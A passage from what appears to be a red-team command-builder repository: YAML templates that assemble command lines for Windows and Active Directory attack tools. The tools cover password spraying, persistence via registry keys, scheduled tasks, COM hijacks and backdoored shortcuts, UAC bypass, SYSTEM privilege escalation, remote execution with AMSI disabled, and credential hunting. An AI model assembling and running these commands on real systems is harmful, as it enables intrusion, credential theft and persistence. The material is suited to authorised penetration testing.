optional_flags: [] 161 | 162 | - name: Self-craft command 163 | labels: [SQL, xp_cmdshell] 164 | mitre: '' 165 | verb: '' 166 | required_flags: [Method, Instance] 167 | optional_flags: [Database, LinkedInstance, Username, Command, Query] -------------------------------------------------------------------------------- /commands/SharpShares.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/mitchmoser/SharpShares 3 | name: SharpShares 4 | languages: 5 | - name: EXE 6 | prefix: SharpShares.exe 7 | 8 | params: 9 | - name: Threads 10 | type: text 11 | description: specify maximum number of parallel threads 12 | template: "/threads:{0}" 13 | default: 25 14 | optional: true 15 | - name: DomainController 16 | type: text 17 | description: specify domain controller to query (if not ran on a domain-joined host) 18 | template: "/dc:{0}" 19 | default: dc1 20 | optional: true 21 | - name: Domain 22 | type: text 23 | description: specify domain name (if not ran on a domain-joined host) 24 | template: "/domain:{0}" 25 | default: windomain.local 26 | optional: true 27 | - name: SsLDAP 28 | description: query hosts from the following LDAP filters 29 | default: all 30 | template: "/ldap:{0}" 31 | type: select 32 | options: ["all", "dc", "exclude-dc", "servers", "servers-exclude-dc"] 33 | optional: true 34 | - name: OU 35 | type: text 36 | description: specify LDAP OU to query enabled computer objects from 37 | template: "/ou:\"{0}\"" 38 | default: OU=Special Servers,DC=windomain,DC=local 39 | optional: true 40 | - name: Fiter 41 | type: text 42 | description: list of comma-separated shares to exclude from enumeration 43 | template: "/filter:{0}" 44 | default: SYSVOL,NETLOGON,IPC$,PRINT$ 45 | optional: true 46 | - name: OutFile 47 | type: text 48 | description: specify file for shares to be appended to instead of printing to std out 49 | template: "/outfile:{0}" 50 | default: C:\temp\outfile 51 | optional: 
true 52 | 53 | - name: Stealth 54 | type: flag 55 | description: list share names without performing read/write access checks 56 | value: /stealth 57 | optional: true 58 | selected: true 59 | - name: Verbose 60 | type: flag 61 | description: return unauthorized shares 62 | value: /verbose 63 | optional: true 64 | selected: true 65 | 66 | 67 | sections: 68 | - name: Execute shares search custom 69 | labels: ["Recon"] 70 | mitre: 'T1083' 71 | verb: '' 72 | required_flags: [] 73 | optional_flags: [Threads, DomainController, Domain, SsLDAP, OU, Filter, OutFile, Stealth, Verbose] 74 | - name: Verbose search shares with custom filter, threads, ldap, ou 75 | labels: ["Recon"] 76 | mitre: 'T1083' 77 | verb: '' 78 | required_flags: [Threads, SsLDAP, OU, Filter, Verbose] 79 | optional_flags: [] 80 | - name: Verbose search shares, output results to file 81 | labels: ["Recon"] 82 | mitre: 'T1083' 83 | verb: '' 84 | required_flags: [Threads, SsLDAP, OU, Filter, Verbose, OutFile] 85 | optional_flags: [] 86 | - name: Stealth and verbose search shares, output results to file 87 | labels: ["Recon"] 88 | mitre: 'T1083' 89 | verb: '' 90 | required_flags: [Threads, SsLDAP, OU, Filter, OutFile, Verbose, Stealth] 91 | optional_flags: [] 92 | -------------------------------------------------------------------------------- /commands/SharpSniper.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/HunnicCyber/SharpSniper 3 | name: SharpSniper 4 | languages: 5 | - name: EXE 6 | prefix: SharpSniper.exe 7 | 8 | params: 9 | - name: SearchUser 10 | type: text 11 | description: User to search 12 | template: "{0}" 13 | default: targetuser 14 | optional: false 15 | - name: Username 16 | type: text 17 | description: Domain user Username 18 | template: "{0}" 19 | default: User1 20 | optional: false 21 | - name: Password 22 | type: text 23 | description: Domain user password 24 | template: "{0}" 25 | default: Password123 26 
| optional: false 27 | 28 | 29 | sections: 30 | - name: Search domain user location with current context 31 | labels: ["Recon"] 32 | mitre: '' 33 | verb: '' 34 | required_flags: [SearchUser] 35 | optional_flags: [] 36 | 37 | - name: Search domain user location with supplied creds 38 | labels: ["Recon"] 39 | mitre: '' 40 | verb: '' 41 | required_flags: [SearchUser, Username, Password] 42 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpSpray.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/jnqpblc/SharpSpray 3 | name: SharpSpray 4 | languages: 5 | - name: EXE 6 | prefix: SharpSpray.exe 7 | 8 | params: 9 | - name: SpSeeds 10 | type: text 11 | description: A comma-separated list of passwords to as a seed to the internal list generator. 12 | template: "--Seeds {0}" 13 | default: Password,Welcome 14 | optional: true 15 | 16 | - name: SpPasswords 17 | type: text 18 | description: A comma-separated list of passwords to use instead of the internal list generator. 19 | template: "--Passwords {0}" 20 | default: ItsNotWinter!,P@ssw0rd 21 | optional: true 22 | 23 | - name: SpDelay 24 | type: text 25 | description: The delay time between guesses in millisecounds. 26 | template: "--Delay {0}" 27 | default: 300 28 | optional: true 29 | 30 | - name: SpSleep 31 | type: text 32 | description: The number of minutes to sleep between password cycles. 
33 | template: "--Sleep {0}" 34 | default: 15 35 | optional: true 36 | 37 | sections: 38 | - name: Generic command 39 | labels: ["Passwords", "Lateral"] 40 | mitre: 'T1110.003' 41 | verb: '' 42 | required_flags: [] 43 | optional_flags: [SpSeeds, SpPasswords, SpDelay, SpSleep] 44 | 45 | - name: Password spray with automatic generated passwords with custom sleep 46 | labels: ["Passwords", "Lateral"] 47 | mitre: 'T1110.003' 48 | verb: '' 49 | required_flags: [SpSleep] 50 | optional_flags: [] 51 | 52 | - name: Password spray with predefined seeds for password generation with custom sleep 53 | labels: ["Passwords", "Lateral"] 54 | mitre: 'T1110.003' 55 | verb: '' 56 | required_flags: [SpSeeds, SpSleep] 57 | optional_flags: [] 58 | 59 | - name: Password spray with predefined password list with custom sleep 60 | labels: ["Passwords", "Lateral"] 61 | mitre: 'T1110.003' 62 | verb: '' 63 | required_flags: [SpPasswords, SpSleep] 64 | optional_flags: [] 65 | 66 | - name: Password spray with predefined password list with custom sleep and delay 67 | labels: ["Passwords", "Lateral"] 68 | mitre: 'T1110.003' 69 | verb: '' 70 | required_flags: [SpPasswords, SpSleep, SpDelay] 71 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpStay.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/0xthirteen/SharpStay 3 | name: SharpStay 4 | languages: 5 | - name: EXE 6 | prefix: SharpStay.exe 7 | 8 | params: 9 | - name: General 10 | type: label 11 | 12 | - name: action 13 | description: 14 | default: ListTaskNames 15 | template: "action={0}" 16 | type: select 17 | options: [ElevatedRegistryKey, UserRegistryKey, UserInitMprLogonScriptKey, ElevatedUserInitKey, ScheduledTask, ScheduledTaskAction, SchTaskCOMHijack, CreateService, WMIEventSub, JunctionFolder, NewLNK, BackdoorLNK, ListTaskNames, ListScheduledTasks, ListRunningServices, 
GetScheduledTaskCOMHandler] 18 | optional: false 19 | 20 | - name: command 21 | type: text 22 | description: desc 23 | template: "command=\"{0}\"" 24 | default: C:\Windows\temp\fun.exe 25 | optional: true 26 | 27 | - name: DllPath 28 | type: text 29 | description: desc 30 | template: "dllpath={0}" 31 | default: C:\windows\temp\fun.dll 32 | optional: true 33 | 34 | - name: Registry 35 | type: label 36 | 37 | - name: KeyName 38 | type: text 39 | description: Registry key name 40 | template: "keyname={0}" 41 | default: Debug 42 | optional: true 43 | 44 | - name: KeyPath 45 | type: text 46 | description: Registry key path 47 | template: "keypath={0}" 48 | default: HKCU:Software\Microsoft\Windows\CurrentVersion\Run 49 | optional: true 50 | selected: false 51 | 52 | - name: Task Scheduler 53 | type: label 54 | 55 | - name: taskname 56 | type: text 57 | description: desc 58 | template: "taskname={0}" 59 | default: TestTask 60 | optional: true 61 | selected: false 62 | 63 | - name: runasuser 64 | type: text 65 | description: desc 66 | template: "runasuser={0}" 67 | default: user1 68 | optional: true 69 | 70 | - name: triggertype 71 | type: text 72 | description: desc 73 | template: "triggertype={0}" 74 | default: logon 75 | optional: true 76 | 77 | - name: author 78 | type: text 79 | description: desc 80 | template: "author={0}" 81 | default: Microsoft Corp. 
82 | optional: true 83 | 84 | - name: description 85 | type: text 86 | description: desc 87 | template: "description=\"{0}\"" 88 | default: Test Task 89 | optional: true 90 | 91 | - name: logonuser 92 | type: text 93 | description: desc 94 | template: "logonuser={0}" 95 | default: user1 96 | optional: true 97 | 98 | - name: folder 99 | type: text 100 | description: desc 101 | template: "folder=\"{0}\"" 102 | default: \\ 103 | optional: true 104 | 105 | - name: actionid 106 | type: text 107 | description: desc 108 | template: "actionid={0}" 109 | default: ExecAction 110 | optional: true 111 | 112 | - name: COM Hijack 113 | type: label 114 | 115 | - name: clsid 116 | type: text 117 | description: desc 118 | template: "clsid={0}" 119 | default: "{a47af52a-27f9-4426-bd2b-727050712db1}" 120 | optional: true 121 | 122 | - name: Service 123 | type: label 124 | 125 | - name: ServiceName 126 | type: text 127 | description: Service name 128 | template: "servicename={0}" 129 | default: TestService 130 | optional: true 131 | selected: false 132 | 133 | - name: WMI event 134 | type: label 135 | 136 | - name: eventname 137 | type: text 138 | description: desc 139 | template: "eventname={0}" 140 | default: Debugger 141 | optional: true 142 | 143 | - name: attime 144 | type: text 145 | description: desc 146 | template: "attime={0}" 147 | default: startup 148 | optional: true 149 | 150 | - name: Junction folder 151 | type: label 152 | 153 | - name: guid 154 | type: text 155 | description: desc 156 | template: "guid={0}" 157 | default: "{a47af52a-27f9-4426-bd2b-727050712db1}" 158 | optional: true 159 | 160 | - name: LNK 161 | type: label 162 | 163 | - name: filepath 164 | type: text 165 | description: desc 166 | template: "filepath=\"{0}\"" 167 | default: C:\users\admin\desktop 168 | optional: true 169 | 170 | - name: lnkname 171 | type: text 172 | description: desc 173 | template: "lnkname=\"{0}\"" 174 | default: Notepad.lnk 175 | optional: true 176 | 177 | - name: lnktarget 178 | 
type: text 179 | description: desc 180 | template: "lnktarget=\"{0}\"" 181 | default: C:\Windows\temp\file.exe 182 | optional: true 183 | 184 | - name: lnkicon 185 | type: text 186 | description: desc 187 | template: "lnkicon=\"{0}\"" 188 | default: C:\Windows\system32\notepad.exe 189 | optional: true 190 | 191 | - name: LnkPath 192 | type: text 193 | description: desc 194 | template: "lnkpath=\"{0}\"" 195 | default: C:\users\user\desktop\Excel.lnk 196 | optional: true 197 | 198 | - name: Flags 199 | type: label 200 | 201 | - name: cleanup 202 | type: flag 203 | description: desc 204 | value: cleanup=true 205 | optional: true 206 | selected: false 207 | 208 | sections: 209 | - name: Self create persistancy command 210 | labels: [Persistancy] 211 | mitre: '' 212 | verb: '' 213 | required_flags: [action] 214 | optional_flags: [command, DllPath, KeyName, KeyPath, taskname, runasuser, triggertype, author, description, logonuser, folder, actionid, clsid, ServiceName, eventname, attime, guid, filepath, lnkname, lnktarget, lnkicon, LnkPath, cleanup] 215 | 216 | - name: User registry 217 | labels: [Persistancy] 218 | mitre: '' 219 | verb: 'action=UserRegistryKey' 220 | required_flags: [keyname, keypath, command] 221 | optional_flags: [cleanup] 222 | 223 | - name: Elevated user registry 224 | labels: [] 225 | mitre: '' 226 | verb: 'action=ElevatedRegistryKey' 227 | required_flags: [keyname, keypath, command] 228 | optional_flags: [cleanup] 229 | 230 | - name: User logon script 231 | labels: [Persistancy] 232 | mitre: '' 233 | verb: 'action=UserInitMprLogonScriptKey' 234 | required_flags: [command] 235 | optional_flags: [] 236 | 237 | - name: Elevated user init key 238 | labels: [Persistancy] 239 | mitre: '' 240 | verb: 'action=ElevatedUserInitKey' 241 | required_flags: [command] 242 | optional_flags: [] 243 | 244 | - name: Scheduled Task 245 | labels: [Persistancy] 246 | mitre: '' 247 | verb: 'action=ScheduledTask' 248 | required_flags: [taskname, command, runasuser, 
triggertype, author, description, logonuser] 249 | optional_flags: [cleanup] 250 | 251 | - name: Scheduled Task action 252 | labels: [Persistancy] 253 | mitre: '' 254 | verb: 'action=ScheduledTask' 255 | required_flags: [taskname, command, folder, actionid] 256 | optional_flags: [cleanup] 257 | 258 | - name: Scheduled Task COM Hijack 259 | labels: [Persistancy] 260 | mitre: '' 261 | verb: 'action=SchTaskCOMHijack' 262 | required_flags: [clsid, dllpath] 263 | optional_flags: [cleanup] 264 | 265 | - name: Service creation 266 | labels: [Persistancy] 267 | mitre: '' 268 | verb: 'action=CreateService' 269 | required_flags: [servicename, command] 270 | optional_flags: [cleanup] 271 | 272 | - name: WMIEventSub 273 | labels: [Persistancy] 274 | mitre: '' 275 | verb: 'action=WMIEventSub' 276 | required_flags: [command, eventname, attime] 277 | optional_flags: [cleanup] 278 | 279 | - name: JunctionFolder 280 | labels: [Persistancy] 281 | mitre: '' 282 | verb: 'action=JunctionFolder' 283 | required_flags: [dllpath, guid] 284 | optional_flags: [cleanup] 285 | 286 | - name: New LNK 287 | labels: [Persistancy] 288 | mitre: '' 289 | verb: 'action=NewLNK' 290 | required_flags: [filepath, lnkname, lnktarget, lnkicon, ] 291 | optional_flags: [cleanup] 292 | 293 | - name: Backdoor LNK 294 | labels: [Persistancy] 295 | mitre: '' 296 | verb: 'action=BackdoorLNK' 297 | required_flags: [command, lnkpath] 298 | optional_flags: [cleanup] -------------------------------------------------------------------------------- /commands/SharpUp.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/GhostPack/SharpUp 3 | name: SharpUp 4 | languages: 5 | - name: EXE 6 | prefix: SharpUp.exe 7 | 8 | params: 9 | - name: Audit 10 | type: flag 11 | description: Specifies whether or not to enable audit mode 12 | value: audit 13 | optional: true 14 | selected: true 15 | 16 | - name: Check 17 | description: The individual 
vulnerability check to be run
type: text 51 | description: Process name or PID 52 | template: "process={0}" 53 | default: agent.exe 54 | optional: true 55 | selected: false 56 | 57 | - name: command 58 | type: text 59 | description: Command to execute 60 | template: "command=\"{0} {CommandArgs}\"" 61 | default: whoami 62 | optional: true 63 | selected: false 64 | 65 | - name: CommandArgs 66 | type: text 67 | description: Command arguments 68 | template: "{0}" 69 | default: "" 70 | optional: true 71 | selected: false 72 | 73 | - name: namespace 74 | type: text 75 | description: WMI namespace to query 76 | template: "namespace=\"{0}\"" 77 | default: root\\SecurityCenter2 78 | optional: true 79 | selected: false 80 | 81 | - name: Username 82 | type: text 83 | description: desc 84 | template: "username=\"{0}\"" 85 | default: windomain\User1 86 | optional: true 87 | selected: false 88 | 89 | - name: Password 90 | type: text 91 | description: desc 92 | template: "password=\"{0}\"" 93 | default: Password123 94 | optional: true 95 | selected: false 96 | 97 | - name: script 98 | type: text 99 | description: VBS script to execute, script or path 100 | template: "script=\"{0}\"" 101 | default: CreateObject(\\"WScript.Shell\\").Run(\\"notepad.exe\\") 102 | optional: true 103 | selected: false 104 | 105 | - name: scriptb64 106 | type: text 107 | description: Base64 encoded VBS script to execute, script or path 108 | template: "scriptb64=\"{0}\"" 109 | default: myscript.vbs.b64 110 | optional: true 111 | selected: false 112 | 113 | - name: url 114 | type: text 115 | description: URL to script to execute within VBS 116 | template: "script=\"{0}\"" 117 | default: https://mydomain.io/location/script.vbs 118 | optional: true 119 | selected: false 120 | 121 | - name: trigger 122 | type: text 123 | description: Trigger in seconds 124 | template: "trigger={0}" 125 | default: 5 126 | optional: true 127 | selected: false 128 | 129 | - name: timeout 130 | type: text 131 | description: Timeout in seconds 132 | 
template: "timeout={0}" 133 | default: 10 134 | optional: true 135 | selected: false 136 | 137 | - name: DisableAmsi 138 | type: flag 139 | description: Disable AMSI 140 | value: amsi=disable 141 | optional: true 142 | selected: true 143 | 144 | - name: Result 145 | type: flag 146 | description: Display result 147 | value: result=true 148 | optional: true 149 | selected: true 150 | 151 | sections: 152 | - name: Self create WMI command 153 | labels: [WMI] 154 | mitre: '' 155 | verb: '' 156 | required_flags: [action] 157 | optional_flags: [ComputerName, query, Username, Password, command, CommandArgs, Process, VariableName, VariableValue, url, script, scriptb64, timeout, trigger, DisableAmsi, Result] 158 | 159 | - name: Query WMI 160 | labels: [WMI, Recon] 161 | mitre: '' 162 | verb: 'action=query' 163 | required_flags: [query] 164 | optional_flags: [namespace, Username, Password] 165 | 166 | - name: Remote system Logged On users enumeration 167 | labels: [WMI, Recon] 168 | mitre: '' 169 | verb: 'action=loggedon' 170 | required_flags: [ComputerName] 171 | optional_flags: [Username, Password] 172 | 173 | - name: Remote process creation 174 | labels: [WMI, Lateral] 175 | mitre: '' 176 | verb: 'action=exec' 177 | required_flags: [command] 178 | optional_flags: [ComputerName, DisableAmsi, Result, Username, Password] 179 | 180 | - name: List processes 181 | labels: [WMI, Recon] 182 | mitre: '' 183 | verb: 'action=ps' 184 | required_flags: [] 185 | optional_flags: [ComputerName, Username, Password] 186 | 187 | - name: Terminate process (first found) 188 | labels: [WMI] 189 | mitre: '' 190 | verb: 'action=terminate' 191 | required_flags: [Process] 192 | optional_flags: [ComputerName, Username, Password] 193 | 194 | - name: Get environment variables (all if name not given) 195 | labels: [WMI, Recon] 196 | mitre: '' 197 | verb: 'action=getenv' 198 | required_flags: [] 199 | optional_flags: [VariableName, ComputerName, Username, Password] 200 | 201 | - name: Set environment 
variable 202 | labels: [WMI] 203 | mitre: '' 204 | verb: 'action=setenv' 205 | required_flags: [VariableName, VariableValue] 206 | optional_flags: [ComputerName, Username, Password] 207 | 208 | - name: Delete an environment variable 209 | labels: [WMI] 210 | mitre: '' 211 | verb: 'action=delenv' 212 | required_flags: [VariableName] 213 | optional_flags: [ComputerName, Username, Password] 214 | 215 | - name: Install MSI file 216 | labels: [WMI, Lateral] 217 | mitre: '' 218 | verb: 'action=install' 219 | required_flags: [path] 220 | optional_flags: [ComputerName, DisableAmsi, Username, Password] 221 | 222 | - name: Execute VBS 223 | labels: [WMI, Lateral] 224 | mitre: '' 225 | verb: 'action=executevbs' 226 | required_flags: [] 227 | optional_flags: [script, scriptb64, url, command, trigger, timeout, Username, Password] -------------------------------------------------------------------------------- /commands/Snaffler.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/SnaffCon/Snaffler 3 | name: Snaffler 4 | languages: 5 | - name: EXE 6 | prefix: Snaffler.exe 7 | - name: Apollo 8 | prefix: inline_assembly -Assembly "Snaffler.exe" -Arguments " 9 | params: 10 | 11 | - name: domain 12 | description: 'Domain to search for computers to search for shares on to search for files in' 13 | template: "-d {0}" 14 | optional: true 15 | selected: false 16 | type: text 17 | default: '' 18 | 19 | - name: domain controller 20 | description: 'Domain controller to query for the list of domain computers' 21 | template: "-c {0}" 22 | optional: true 23 | selected: false 24 | type: text 25 | default: '' 26 | 27 | - name: results to a file 28 | description: 'Enables outputting results to a file' 29 | template: "-o {0}" 30 | optional: true 31 | selected: false 32 | type: text 33 | default: '' 34 | 35 | - name: stdout 36 | description: 'Enables outputting results to stdout' 37 | template: "-s" 38 | optional: true 
39 | selected: false 40 | type: flag 41 | default: '' 42 | 43 | - name: verbosity level 44 | description: 'Controls verbosity level' 45 | template: "-v {0}" 46 | optional: true 47 | selected: false 48 | type: select 49 | options: [ 50 | 'Trace', 51 | 'Degub', 52 | 'Info', 53 | 'Data ', 54 | ] 55 | default: 'Info' 56 | 57 | - name: output dir 58 | description: 'Enables and assigns an output dir for snaffler to automatically take a copy of any found files that it likes' 59 | template: "-m {0}" 60 | optional: true 61 | selected: false 62 | type: text 63 | default: '' 64 | 65 | - name: Maximum size of files 66 | description: 'Maximum size of files (in bytes)' 67 | template: "-l {0}" 68 | optional: true 69 | selected: false 70 | type: text 71 | default: '10000000' 72 | 73 | - name: Disables computer and share discovery 74 | description: 'Disables computer and share discovery - requires a path to a directory in which to perform file discovery' 75 | template: "-i {0}" 76 | optional: true 77 | selected: false 78 | type: text 79 | default: '' 80 | 81 | - name: Disables computer discovery 82 | description: 'Disables computer discovery - takes a comma-separated list of hosts to do share and file discovery on' 83 | template: "-n {0}" 84 | optional: true 85 | selected: false 86 | type: text 87 | default: '' 88 | 89 | - name: TSV-formats the output 90 | description: 'TSV-formats the output' 91 | template: "-y {0}" 92 | optional: true 93 | selected: false 94 | type: flag 95 | default: '' 96 | 97 | - name: skips the LAIM rules 98 | description: 'Skips the LAIM rules that will find less-interesting stuff' 99 | template: "-b {0}" 100 | optional: true 101 | selected: false 102 | type: select 103 | options: [ 104 | '1', 105 | '2', 106 | '3', 107 | ] 108 | 109 | - name: finding file shares via DFS 110 | description: 'Limits Snaffler to finding file shares via DFS' 111 | template: "-f" 112 | optional: true 113 | selected: false 114 | type: flag 115 | default: '' 116 | 117 | - name: file 
enumeration 118 | description: 'Skips file enumeration' 119 | template: "-a" 120 | optional: true 121 | selected: false 122 | type: flag 123 | default: '' 124 | 125 | - name: list account names from AD 126 | description: 'pull a list of account names from AD' 127 | template: "-u" 128 | optional: true 129 | selected: false 130 | type: flag 131 | default: '' 132 | 133 | - name: maximum file size 134 | description: 'The maximum size file (in bytes) to search inside for interesting strings' 135 | template: "-r {0}" 136 | optional: true 137 | selected: false 138 | type: text 139 | default: '500K' 140 | 141 | - name: bytes of context 142 | description: 'How many bytes of context either side of found strings in files to show' 143 | template: "-j {0}" 144 | optional: true 145 | selected: false 146 | type: text 147 | default: '' 148 | 149 | - name: config file path 150 | description: 'Path to a config file' 151 | template: "-z {0}" 152 | optional: true 153 | selected: false 154 | type: text 155 | default: '' 156 | 157 | - name: log type 158 | description: 'Type of log you would like to output' 159 | template: "-t {0}" 160 | optional: true 161 | selected: false 162 | type: select 163 | options: [ 164 | 'plain', 165 | 'json', 166 | ] 167 | default: '' 168 | 169 | - name: max threads 170 | description: 'Max number of threads to use (min 4)' 171 | template: "-x {0}" 172 | optional: true 173 | selected: false 174 | type: text 175 | default: '' 176 | 177 | - name: toml directory path 178 | description: 'Path to a directory full of .toml formatted rules. 
Snaffler will load all of these in place of the default ruleset' 179 | template: "-p {0}" 180 | optional: true 181 | selected: false 182 | type: text 183 | default: '' 184 | 185 | sections: 186 | 187 | - name: Basic 188 | labels: [] 189 | mitre: "" 190 | verb: '' 191 | required_flags: [] 192 | optional_flags: ["domain", "domain controller", "results to a file", "stdout", "verbosity level", "output dir", "Maximum size of files", "Disables computer and share discovery", "Disables computer discovery", "TSV-formats the output", "skips the LAIM rules", "finding file shares via DFS", "file enumeration", "list account names from AD", "maximum file size", "bytes of context", "config file path", "log type", "max threads", "toml directory path"] 193 | 194 | 195 | -------------------------------------------------------------------------------- /commands/SspiUacBypass.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/antonioCoco/SspiUacBypass 3 | name: SspiUacBypass 4 | languages: 5 | - name: EXE 6 | prefix: SspiUacBypass.exe 7 | - name: Apollo 8 | prefix: inline_assembly -Assembly "SspiUacBypass.exe" -Arguments " 9 | 10 | params: 11 | - name: BinPath 12 | description: Executable path to launch with high integrity 13 | template: "{0}" 14 | default: "C:\\windows\\System32\\cmd.exe" 15 | type: text 16 | optional: true 17 | 18 | 19 | sections: 20 | - name: Launch process as SYSTEM 21 | labels: ["PeivEsc", "UAC"] 22 | mitre: '' 23 | verb: '' 24 | required_flags: [] 25 | optional_flags: [BinPath] 26 | -------------------------------------------------------------------------------- /commands/SweetPotato.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/CCob/SweetPotato 3 | name: SweetPotato 4 | languages: 5 | - name: EXE 6 | prefix: SweetPotato.exe 7 | 8 | params: 9 | - name: CLSID 10 | type: text 11 | description: CLSID, 
default BITS 12 | default: 4991D34B-80A1-4291-83B6-3328366B9097 13 | optional: true 14 | selected: false 15 | template: "-c {0}" 16 | 17 | - name: Method 18 | type: select 19 | description: Method 20 | default: Auto 21 | options: ["Auto", "User", "Thread"] 22 | optional: true 23 | selected: false 24 | template: "-m {0}" 25 | 26 | - name: Prog 27 | type: text 28 | description: Program to launch 29 | default: cmd.exe 30 | template: "-p {0}" 31 | optional: true 32 | selected: true 33 | 34 | - name: Args 35 | type: text 36 | description: Arguments for program (default null) 37 | default: 38 | template: "-a {0}" 39 | optional: true 40 | selected: false 41 | 42 | - name: Exploit 43 | type: select 44 | description: Exploit mode 45 | default: PrintSpoofer 46 | options: ["DCOM", "WinRM", "EfsRpc", "PrintSpoofer"] 47 | template: "-e {0}" 48 | optional: true 49 | selected: false 50 | 51 | - name: ListenPort 52 | type: text 53 | description: COM server listen port 54 | default: 6666 55 | template: "-l {0}" 56 | optional: true 57 | selected: false 58 | 59 | 60 | sections: 61 | - name: Privilege escalation from SA to SYSTEM 62 | labels: ["PrivEsc"] 63 | mitre: "" 64 | verb: "" 65 | required_flags: [] 66 | optional_flags: [CLSID, Method, Prog, Args, Exploit, ListenPort] 67 | -------------------------------------------------------------------------------- /commands/WebFinder.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/Sygnia/webfinder 3 | name: WebFinder 4 | params: 5 | - name: Range 6 | description: Specify IP Range 7 | default: 10.0.1-254.1-254 8 | 9 | sections: 10 | - name: Scan for web pages in network 11 | labels: ['Recon', 'Web'] 12 | commands: 13 | - language: PS 14 | command: WebFinder.ps1 {{Range}} 15 | -------------------------------------------------------------------------------- /commands/WinPEAS.yaml: -------------------------------------------------------------------------------- 
1 | --- 2 | projectLink: https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS 3 | name: winPEAS 4 | languages: 5 | - name: EXE 6 | prefix: winpeas.exe 7 | - name: Apollo 8 | prefix: inline_assembly -Assembly "winPEAS.exe" -Arguments " 9 | 10 | params: 11 | - name: SpecificCheck 12 | description: Select specific check to execute 13 | default: systeminfo 14 | template: "{0}" 15 | type: select 16 | options: [domain, systeminfo, userinfo, processinfo, servicesinfo, applicationsinfo, networkinfo, windowscreds, browserinfo, filesinfo, fileanalysis, eventsinfo] 17 | optional: true 18 | selected: false 19 | 20 | - name: OutFile 21 | type: text 22 | description: Log all output to file defined as logfile 23 | template: "-log={0}" 24 | default: out.txt 25 | optional: true 26 | selected: true 27 | 28 | - name: notcolor 29 | type: flag 30 | description: Do not color the output 31 | value: notcolor 32 | optional: true 33 | selected: true 34 | 35 | - name: searchpf 36 | type: text 37 | description: Search credentials via regex also in Program Files folders 38 | template: "searchpf {0}" 39 | default: Pass.* 40 | optional: true 41 | selected: false 42 | 43 | - name: wait 44 | type: flag 45 | description: Wait for user input between checks 46 | value: "wait" 47 | optional: true 48 | selected: false 49 | 50 | - name: debug 51 | type: flag 52 | description: Display debugging information - memory usage, method execution time 53 | value: "debug" 54 | optional: true 55 | selected: true 56 | 57 | - name: quiet 58 | type: flag 59 | description: Do not print banner 60 | value: "quiet" 61 | optional: true 62 | selected: true 63 | 64 | - name: lolbas 65 | type: flag 66 | description: Run additional LOLBAS check 67 | value: "-lolbas" 68 | optional: true 69 | selected: true 70 | 71 | - name: linpeas 72 | type: text 73 | description: desc 74 | template: "-linpeas={0}" 75 | default: 
https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh 76 | optional: true 77 | selected: false 78 | 79 | sections: 80 | - name: Execute WinPEAS 81 | labels: ["Recon"] 82 | mitre: "" 83 | verb: "" 84 | required_flags: [] 85 | optional_flags: [SpecificCheck, quiet, notcolor, searchpf, wait, debug, OutFile, lolbas, linpeas] -------------------------------------------------------------------------------- /commands/WindowsEnum.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/absolomb/WindowsEnum 3 | name: WindowsEnum 4 | languages: 5 | - name: PS 6 | prefix: '.\WindowsEnum.ps1' 7 | 8 | params: 9 | 10 | - name: extended 11 | type: flag 12 | description: 'Extended checks will search for config files, various interesting files, and passwords in files and the registry, etc. It will take some time so be patient' 13 | value: 'extended' 14 | optional: true 15 | selected: false 16 | 17 | sections: 18 | 19 | - name: Run checks for privilege escalation vectors, optionally extending checks to perform a thorough search of sensitive information 20 | labels: ['Recon', 'PrivEsc'] 21 | mitre: 'T1082' 22 | verb: '' 23 | required_flags: [] 24 | optional_flags: [extended] -------------------------------------------------------------------------------- /commands/nltest.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: 3 | name: nltest 4 | languages: 5 | - name: EXE 6 | prefix: nltest 7 | 8 | params: 9 | - name: Domain 10 | type: text 11 | description: Domain 12 | template: "{0}" 13 | default: example.local 14 | optional: false 15 | 16 | - name: nlServer 17 | type: text 18 | description: Specify server name 19 | template: "/SERVER:{0}" 20 | default: Server1 21 | optional: true 22 | 23 | - name: nlQuery 24 | type: flag 25 | description: Query netlogon service 26 | value: /QUERY 27 | 
optional: true 28 | selected: false 29 | - name: nlREPL 30 | type: flag 31 | description: Force partial sync on BDC 32 | value: /REPL 33 | optional: true 34 | selected: false 35 | - name: nlSync 36 | type: flag 37 | description: Force full sync on BDC 38 | value: /SYNC 39 | optional: true 40 | selected: false 41 | - name: nlPdcREPL 42 | type: flag 43 | description: Force UAS change message from PDC 44 | value: /PDC_REPL 45 | optional: true 46 | selected: false 47 | 48 | - name: nlSCQuery 49 | type: flag 50 | description: descQuery secure channel for on 51 | value: "/SC_QUERY:{Domain}" 52 | optional: true 53 | selected: false 54 | - name: nlSCReset 55 | type: flag 56 | description: Reset secure channel for on to 57 | value: "/SC_RESET:{Domain}" 58 | optional: true 59 | selected: false 60 | - name: nlSCVerify 61 | type: flag 62 | description: Verify secure channel for on 63 | value: "/SC_VERIFY:{Domain}" 64 | optional: true 65 | selected: false 66 | - name: nlDCList 67 | type: flag 68 | description: Get list of DC's for specified domain 69 | template: "/DCLIST:{Domain}" 70 | optional: true 71 | selected: false 72 | 73 | 74 | sections: 75 | - name: Self crafted command 76 | labels: [] 77 | mitre: '' 78 | verb: '' 79 | required_flags: [] 80 | optional_flags: [ 81 | nlServer, 82 | nlQuery, 83 | nlREPL, 84 | nlSync, 85 | nlPdcREPL, 86 | nlSCQuery, 87 | nlSCReset, 88 | nlSCVerify, 89 | nlDCList 90 | ] 91 | - name: Get DC list 92 | labels: ['Recon'] 93 | mitre: '' 94 | verb: '' 95 | required_flags: [nlDCList] 96 | optional_flags: [nlServer] 97 | -------------------------------------------------------------------------------- /commands/pretender.yaml: -------------------------------------------------------------------------------- 1 | projectLink: 